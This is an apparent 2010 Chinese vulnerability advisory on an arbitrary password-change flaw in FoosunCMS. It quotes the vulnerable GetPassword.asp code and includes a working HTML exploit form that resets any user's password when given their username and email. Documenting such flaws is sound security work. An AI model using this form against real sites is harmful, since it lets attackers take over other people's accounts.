风讯网站管理系统 任意修改密码漏洞
发布:admin | 发布时间: 2010年7月5日foosuncms是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
漏洞分析:
在文件\User\ GetPassword.asp中:
ElseIf Request.Form("Action") = "step3" then //第28行 Call step3() …… Sub step3() //第198行 Dim p_pass_new,p_confim_pass_new p_pass_new = md5(Request.Form("pass_new"),16) …… User_Conn.execute("Update FS_ME_Users set UserPassword ='"& NoSqlHack(p_pass_new) &"' where UserName = '"& NoSqlHack(StrUserName) &"' and Email = '"& NoSqlHack(Replace(Request.Form("Email"),"''",""))&"'") //第220行
用户可以本地构造表单使程序直接进入修改密码,只需要知道用户名和邮箱。
漏洞利用:
- <form id="form1" name="form1" method="post" action="http://ssvdb.com/User/GetPassword.asp">
- <input name="Action" type="text" id="Action" value="step3" />
- <input name="pass_new" type="text" id="pass_new" value="123456" />
- <input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />
- <input name="Email" type="text" id="Email" value="bb@126.com" />
- <input name="UserName" type="text" id="UserName" value="bb" />
- <input type="submit" name="Submit" value="提交" />
- </form>
发布:admin | 分类:最新漏洞 | 评论:0 | 引用:0 | 浏览:
| TrackBack引用地址
- 相关文章:
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。